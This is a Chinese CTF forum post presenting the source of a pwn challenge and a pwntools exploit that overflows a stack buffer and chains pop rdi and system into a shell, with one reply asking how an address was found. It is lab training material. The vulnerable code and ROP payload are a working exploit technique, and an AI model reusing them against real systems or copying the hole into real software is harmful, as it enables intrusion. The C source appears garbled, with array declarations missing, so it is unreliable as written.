xuenixiang_2019_pwn_pwn3_学逆向论坛|免费的CTF在线练习平台|ctf攻防训练靶场|网安夺旗竞赛系统|软件破解|病毒分析|游戏外挂|视频教程|xuenixiang.com

roger 发表于 2020-4-24 00:43:48

xuenixiang_2019_pwn_pwn3

题目源码：

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

char aaa="87asdhf893HF*ry0395$sd)F\x00Y)*SF)";
char ccc="4985y9y()DY)*YFG8yas08d976s08d7$0\x00sadaDS&*(7s";
char bbb="89Y*G(*YfGF0YF8f08yf8\x00)a8s7d0$sd)D9gf-s)";
char ddd="hhhhh, are you finding the binsh?";
char ee="sorry!nothing here!";
char bbddb="23333333333333333333";
int main()
{

   char buf;
memset(&buf,0,0x10);
setvbuf(stdout, 0, 2, 0);
setvbuf(stdin, 0, 1, 0);
printf("Come on,try to pwn me\n");
   read(0,buf,0x30);
printf("So~sad,you are fail\n");
   return 0;
}

void __libc_shell_()
{
   system("ok~you find me,but you can't get my shell'");
}
//????:gcc -z execstack -fno-stack-protector -o stack2 stack2.c

exp：#encoding:utf-8
#!/upr/bin/env python
from pwn import *

p = process("./stack2")
p.recvuntil("Come on,try to pwn me\n")

pop_rdi_ret=0x00000000004007d3
arg=0x60111F
system=0x400570
payload = "a"*0x18+p64(pop_rdi_ret)+p64(arg)+p64(system)

p.send(payload)
p.interactive()

kone 发表于 2020-11-6 23:39:15

arg地址是怎么计算的？

页: [1]

学逆向论坛's Archiver

xuenixiang_2019_pwn_pwn3